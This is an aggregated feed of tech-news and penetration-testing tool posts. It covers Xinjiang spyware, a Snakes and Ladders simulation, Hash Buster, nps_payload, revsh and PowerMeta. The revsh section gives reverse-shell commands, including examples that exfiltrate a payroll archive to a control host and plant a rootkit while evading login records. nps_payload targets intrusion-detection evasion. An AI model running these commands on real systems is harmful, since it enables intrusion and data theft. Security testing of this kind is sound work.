China Is Forcefully Installing Spyware App On The Phones Of Its Muslim Minority

Short Bytes: The Chinese authorities are forcing the Muslim minority population of Xinjiang to install spyware on their smartphones. People are receiving notices via WeChat instructing them to install the app in order to avoid detention of up to 10 days. The app regularly scans the media stored on the phone and matches it against a database of illegal […]

The post China Is Forcefully Installing Spyware App On The Phones Of Its Muslim Minority appeared first on Fossbytes.

http://ift.tt/2uXVji3 http://ift.tt/2aM8QhC


Simulating Snakes and Ladders for Fun, Not Profit

A great many of you will remember the game of Snakes and Ladders from your youth. It’s a simple game, which one grows to realise involves absolutely no skill – it’s purely the luck of the dice. [Alex Laratro] noticed that without player decisions to affect the outcome, the game was a prime candidate for simulation.

[Alex] wanted to dive into the question of “Who is winning a game of Snakes and Ladders?” at any given point in the gameplay. A common approach would be to state “whoever is in front”, but the ladders might have something to say about that. [Alex] uses Markov analysis to investigate, coming to some interesting conclusions about how the game works, and how this compares to the design of more complex games like Mario Kart and Power Grid.

Overall, it’s a breakdown of a popular game that’s simple enough to really sink your teeth into, but has some incredibly interesting conclusions that are well worth considering for anyone designing their own board games. We love seeing math applied to novel and fun problems – and it can solve important problems, too.
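As an added illustration of the Markov approach (not [Alex Laratro]'s code), the block below scores a position by the probability that the player to move finishes first, on a small constructed board with a 6-sided die and the assumed rule that an overshooting roll is forfeited:

```python
"""Markov-chain view of Snakes and Ladders: how far ahead is a player really?
Added example, not [Alex Laratro]'s code. Assumptions: 6-sided die, a roll
that would overshoot the last square is forfeited, and a small constructed
board with three ladders and three snakes."""
FINAL = 30
# Constructed board: start square -> end square (ladders up, snakes down).
JUMPS = {3: 14, 8: 19, 17: 4, 22: 27, 26: 11, 28: 9}

def move(square, roll):
    """Square reached after one roll, applying any snake or ladder landed on."""
    target = square + roll
    if target > FINAL:
        return square            # overshoot: the roll is forfeited
    return JUMPS.get(target, target)

def finish_cdf(max_turns):
    """cdf[k][s] = P(a lone player on square s has finished within k turns)."""
    cdf = [[1.0 if s == FINAL else 0.0 for s in range(FINAL + 1)]]
    for _ in range(max_turns):
        prev = cdf[-1]
        cdf.append([1.0 if s == FINAL else
                    sum(prev[move(s, r)] for r in range(1, 7)) / 6
                    for s in range(FINAL + 1)])
    return cdf

def expected_turns(square, max_turns=400):
    """Mean turns to finish: sum over k of P(still playing after k turns)."""
    cdf = finish_cdf(max_turns)
    return sum(1 - cdf[k][square] for k in range(max_turns))

def p_first_player_wins(a, b, max_turns=400):
    """Player on square a moves next, opponent is on b. P(a finishes first).
    a wins on turn k if it finishes exactly then and b, who has had k-1
    turns at that moment, has not finished yet."""
    cdf = finish_cdf(max_turns)
    return sum((cdf[k][a] - cdf[k - 1][a]) * (1 - cdf[k - 1][b])
               for k in range(1, max_turns + 1))
```

Comparing p_first_player_wins(a, b) across squares is the quantitative version of "who is winning", and it is not monotone in a because of the snakes ahead of a square.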

Filed under: classic hacks http://ift.tt/2gW9hLa http://ift.tt/2aM8QhC

Hash Buster: scrapes online hash crackers to find cleartext of a hash – Penetration Testing

Hash-Buster

Hash Buster is a Python script which queries several online hash crackers to find the cleartext of a hash in less than 5 seconds.

Features of Hash Buster:

Detects hash

MD5 Support

SHA1 Support

SHA2 Support

Adding more APIs for SHA1 and SHA2

More hash types will be added on demand

Installing and Using Hash Buster

Open your terminal and enter

git clone http://ift.tt/2uo3pyX
cd Hash-Buster
python hash.py

Source: http://ift.tt/2uTejhQ

The post Hash Buster: scrapes online hash crackers to find cleartext of a hash appeared first on Penetration Testing.

http://ift.tt/2uodFHJ http://ift.tt/2aM8QhC

nps_payload: generate payloads for basic intrusion detection avoidance – Penetration Testing

This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.

Installation

Setting up samba shares:

1.) apt-get install samba

2.) vi/nano/whatever /etc/samba/smb.conf

3.) add the following to the bottom of the file (change as appropriate)

[payloads$]
comment = Dirty Payloads
path = /opt/shares/payloads
browsable = yes
guest ok = yes
read only = yes

4.) service smbd restart

git clone http://ift.tt/2vzEHKC
cd nps_payload
pip install -r requirements.txt

Source: http://ift.tt/2upzjJT

The post nps_payload: generate payloads for basic intrusion detection avoidance appeared first on Penetration Testing.

http://ift.tt/2uomsco http://ift.tt/2aM8QhC

revsh: A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities – Penetration Testing

revsh

revsh is a tool for establishing reverse shells with terminal support, reverse VPNs for advanced pivoting, as well as arbitrary data tunneling.

What is a “reverse shell”?

A reverse shell is a network connection that grants shell access to a remote host. As opposed to other remote login tools such as telnet and ssh, a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only.

What is a “reverse VPN”?

revsh is capable of attaching a virtual Ethernet card (tun/tap) to both ends of its crypto tunnel. These cards can then be used to forward raw IP packets or Ethernet frames. When combined with an iptables NAT rule, or by bridging a real Ethernet card, this gives the operator a fully routable IP address on the target machine's network. This is essentially a full VPN that has performed a connect-back call to the operator to circumvent inbound packet filtering and grant the operator full network access.

What is a “bind shell”?

A bind shell is a shell that is served from a normal forward network connection. revsh supports both reverse and bind shells. To invoke a bind shell, either pass the -b flag on both ends of the connection or invoke the binary as 'bindsh'.

Can’t I just use netcat?

There are many techniques for establishing a reverse shell, but these methods don’t provide terminal support. revsh allows for a reverse shell whose connection is mediated by a pseudo-terminal, and thus allows for features such as:

job control

control character processing (e.g. Ctrl-C)

auto-completion

support for programs requiring a controlling tty (e.g. vi)

processing of window re-size events

In addition, revsh also offers the following features:

UTF-8 support.

Circumvents utmp / wtmp. (No login recorded.)

Processes rc file commands upon login for easy scripting.

OpenSSL encryption with key based authentication baked into the binary.

Anonymous Diffie-Hellman encryption upon request.

Ephemeral Diffie-Hellman encryption as default. (Now with more Perfect Forward Secrecy!)

Cert pinning for protection against sinkholes and mitm counter-intrusion.

Connection timeout for remote process self-termination.

Randomized retry timers for non-predictable auto-reconnection.

Netcat style non-interactive data brokering for file transfer.

Proxy support: point-to-point, SOCKS 4, SOCKS 4a, and SOCKS 5. Proxies are available in both directions for complete flexibility.

TUN / TAP support for forwarding raw IP packets / Ethernet frames.

Escape sequence commands to kill non-responsive nodes, or print connection statistics.

revsh is intended as a supplementary tool for a pentester's toolkit that provides the full set of terminal features across an encrypted tunnel, all in a small (~75k), easy-to-use binary.
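One defender-side check that follows from the utmp/wtmp claim above, as an added example rather than anything from revsh: list pseudo-terminal shells that have no utmp record. The ps and who text is constructed; on a live host both would be read via subprocess.

```python
"""Cross-check pseudo-terminal shells against utmp. revsh states that it
skips utmp/wtmp, so an interactive session it opens shows up in `ps` with a
controlling pts but has no `who` entry. Added example, not revsh's code; the
ps/who text below is constructed (live use would read both via subprocess)."""

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}

# Constructed output of `ps -eo pid,tty,user,comm`.
PS_OUTPUT = """\
  PID TT       USER     COMMAND
 1201 pts/0    alice    bash
 1377 pts/1    www-data bash
 1402 pts/1    www-data vi
 2048 ?        root     sshd
"""

# Constructed output of `who`: only utmp-backed logins appear here.
WHO_OUTPUT = """\
alice    pts/0        2017-07-20 09:12 (10.0.0.5)
"""

def parse_ps(text):
    """(pid, tty, user, command) for every process with a pts/N controlling tty."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[1].startswith("pts/"):
            rows.append((int(parts[0]), parts[1], parts[2], parts[3]))
    return rows

def parse_who(text):
    """Set of ttys that have a utmp record."""
    return {line.split()[1] for line in text.splitlines() if line.strip()}

def unregistered_pty_shells(ps_text, who_text):
    """Shells sitting on a pty that utmp never saw: worth a closer look."""
    registered = parse_who(who_text)
    return [row for row in parse_ps(ps_text)
            if row[1] not in registered and row[3] in SHELLS]
```

Terminal multiplexers and some desktop terminal emulators also open ptys without utmp records, so treat a hit as a lead to triage (parent process, sockets owned by that pid), not a verdict.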

Where can I use revsh?

revsh was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:

x86_64 Linux

i686 Linux

amd64 FreeBSD

Installation

sudo apt-get install openssl libssl-dev # Pre-req for building.
git clone http://ift.tt/2uof4hf
cd revsh
vi config.h # Set up new defaults that fit your situation.
make # This *can* take a very long time, though it usually doesn’t.
make install
cd ~/.revsh
vi rc # Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h

Usage

empty@monkey:~$ revsh -h

Control: revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
Target: revsh [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]

CONTROL_OPTIONS:
-c Run in “command and control” mode. (Default is target mode.)
-a Enable Anonymous Diffie-Hellman mode. (Default is Ephemeral Diffie-Hellman.)
-d KEYS_DIR Reference the keys in an alternate directory. (Default is “~/.revsh/keys/”.)
-f RC_FILE Reference an alternate rc file. (Default is “~/.revsh/rc”.)
-s SHELL Invoke SHELL as the remote shell. (Default is “/bin/bash”.)
-F LOG_FILE Log general use and errors to LOG_FILE. (No default set.)

TARGET_OPTIONS:
-t SEC Set the connection timeout to SEC seconds. (Default is “3600”.)
-r SEC1,SEC2 Set the retry time to be SEC1 seconds, or to be random
in the range from SEC1 to SEC2. (Default is “600,1200”.)

MUTUAL_OPTIONS:
-k Run in keep-alive mode. Node will neither
exit normally, nor seppuku from timeout.
-L [LHOST:]LPORT:RHOST:RPORT
Static socket forwarding with a local
listener at LHOST:LPORT forwarding to
RHOST:RPORT.
-R [RHOST:]RPORT:LHOST:LPORT
Static socket forwarding with a remote
listener at RHOST:RPORT forwarding to
LHOST:LPORT.
-D [LHOST:]LPORT
Dynamic socket forwarding with a local
listener at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.)
-B [RHOST:]RPORT
Dynamic socket forwarding with a remote
listener at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.)
-x Disable automatic setup of proxies. (Defaults: Proxy D2280 and tun/tap devices.)
-b Start in bind shell mode. (Default is reverse shell mode.)
The -b flag must be invoked on both ends.
-n Non-interactive netcat style data broker. (Default is interactive w/remote tty.)
No tty. Useful for copying files.
-v Verbose. -vv and -vvv increase verbosity.
-h Print this help.
-e Print out some usage examples.

ADDRESS The address of the control listener. (Default is “0.0.0.0”.)
PORT The port of the control listener. (Default is “2200”.)

Examples

Control host example IP: 192.168.0.42
Target host example IP: 192.168.0.66

Interactive example on default port ‘2200’:
control: revsh -c
target: revsh 192.168.0.42

Interactive example on non-standard port ‘443’:
control: revsh -c 192.168.0.42:443
target: revsh 192.168.0.42:443

Bindshell example:
target: revsh -b
control: revsh -c -b 192.168.0.66

Non-interactive file upload example:
control: cat ~/bin/rootkit | revsh -c -n
target: revsh 192.168.0.42 > ./totally_not_a_rootkit

Non-interactive file download example:
control: revsh -c -n >payroll_db.tar
target: cat payroll_db.tar | revsh 192.168.0.42

Non-interactive file download example across existing tunnel:
control: revsh -c -n 127.0.0.1:2291 >payroll_db.tar
target: cat payroll_db.tar | revsh 127.0.0.1:2290

Source: Github

The post revsh: A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities appeared first on Penetration Testing.

http://ift.tt/2uohTz9 http://ift.tt/2aM8QhC

PowerMeta: searches for publicly available files hosted on various websites for a particular domain – Penetration Testing

PowerMeta

PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google and Bing searches. It then allows those files to be downloaded from the target domain. After retrieving the files, PowerMeta can analyze the metadata associated with them. Some interesting things commonly found in metadata are usernames, domains, software titles, and computer names.

Public File Discovery

For many organizations, it’s common to find publicly available files posted on their external websites. Many times these files contain sensitive information that might be of benefit to an attacker like usernames, domains, software titles or computer names. PowerMeta searches both Bing and Google for files on a particular domain using search strings like “site:targetdomain.com filetype:pdf”. By default, it searches for “pdf, docx, xlsx, doc, xls, pptx, and ppt”.

Metadata Extraction

PowerMeta uses Exiftool by Phil Harvey to extract metadata information from files. If you would prefer to download the binary from his site directly instead of using the one in this repo it can be found here: http://ift.tt/xDUeQA. Just make sure the exiftool executable is in the same directory as PowerMeta.ps1 when it is run. By default, it just extracts the ‘Author’ and ‘Creator’ fields as these commonly have usernames saved. However, all metadata for files can be extracted by passing PowerMeta the -ExtractAllToCsv flag.
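The same Author/Creator fields can be audited on your own documents before they are published. This is an added example, not PowerMeta's code: it reads .docx core properties with the Python standard library instead of exiftool, does a naive scan of PDF /Author, /Creator and /Producer literal strings, and flags values that look like account names; the sample .docx and PDF bytes are constructed inline.

```python
"""Pre-publication audit of the metadata fields PowerMeta harvests (Author
and Creator). Added example, not PowerMeta's code: it reads .docx core
properties with the standard library instead of exiftool and does a naive
scan of PDF /Author /Creator /Producer literal strings. Samples are constructed."""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
PDF_INFO = re.compile(rb"/(Author|Creator|Producer)\s*\(([^)]*)\)")
# Heuristic for a login name rather than a display name: jsmith, CORP\jsmith
ACCOUNT = re.compile(r"^(?:[A-Za-z0-9-]+\\)?[a-z][a-z0-9._-]{2,}$")

def docx_metadata(data: bytes) -> dict:
    """Author and LastModifiedBy from docProps/core.xml, where Word stores them."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        root = ET.fromstring(zf.read("docProps/core.xml"))
    found = {}
    for field, path in (("Author", "dc:creator"), ("LastModifiedBy", "cp:lastModifiedBy")):
        node = root.find(path, NS)
        if node is not None and node.text:
            found[field] = node.text
    return found

def pdf_metadata(data: bytes) -> dict:
    """Info-dictionary entries written as plain literal strings (no escapes or hex)."""
    return {k.decode(): v.decode("latin-1") for k, v in PDF_INFO.findall(data)}

def account_like_fields(meta: dict) -> list:
    """Field names whose value looks like an account name and should be scrubbed."""
    return sorted(f for f, v in meta.items() if ACCOUNT.match(v))

def build_sample_docx(creator: str, modified_by: str) -> bytes:
    """Constructed minimal .docx: a zip whose only part is docProps/core.xml."""
    core = (
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
        f"<dc:creator>{creator}</dc:creator>"
        f"<cp:lastModifiedBy>{modified_by}</cp:lastModifiedBy></cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
    return buf.getvalue()

# Constructed PDF fragment with an Info dictionary.
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< /Author (jsmith) /Creator (Microsoft Word) >>\nendobj\n"
```

Real PDFs may store these strings hex-encoded or with escapes, and Office files carry more identity fields (docProps/app.xml), so exiftool remains the thorough choice; this block shows what the default PowerMeta fields expose.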

Download

Requirements:
PowerShell version 3.0 or later

git clone http://ift.tt/2uolkFU

Usage

Import the Module

C:\> powershell.exe -exec bypass
PS C:\> Import-Module PowerMeta.ps1

PowerMeta Options

TargetDomain – The target domain to search for files.
FileTypes – A comma-separated list of file extensions to search for. By default PowerMeta searches for “pdf, docx, xlsx, doc, xls, pptx, ppt”.
OutputList – A file to output the list of links discovered through web searching to.
OutputDir – A directory to store all downloaded files in.
TargetFileList – List of file links to download.
Download – Instead of being prompted interactively pass this flag to auto-download files found.
Extract – Instead of being prompted interactively, pass this flag to auto-extract metadata from the files found.
ExtractAllToCsv – All metadata (not just the default fields) will be extracted from files to a CSV specified with this flag.
UserAgent – Change the default User Agent used by PowerMeta.
MaxSearchPages – The maximum number of pages to search on each search engine.

Basic Search

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or ppt. Once it has finished crafting this list, it will prompt the user asking whether they wish to download the files from the target domain. After downloading the files, it will prompt again for extraction of metadata from those files.

PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com

Changing FileTypes and Automatic Download and Extract

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf or xml. It will then automatically download them from the target domain and extract metadata.


Downloading Files From A List

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or ppt and write the links of the files found to disk in a file called “target-domain-links.txt”.


Extract All Metadata and Limit Page Search

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or ppt, but only search the first two pages. All metadata (not just the default fields) will be saved in a CSV called all-target-metadata.csv.


Extract Metadata From Files In A Directory

This command simply extracts all the metadata from all the files in the folder “\2017-03-031-144953” and saves it in a CSV called all-target-metadata.csv.


Source: Github

The post PowerMeta: searches for publicly available files hosted on various websites for a particular domain appeared first on Penetration Testing.

http://ift.tt/2uo89Vn http://ift.tt/2aM8QhC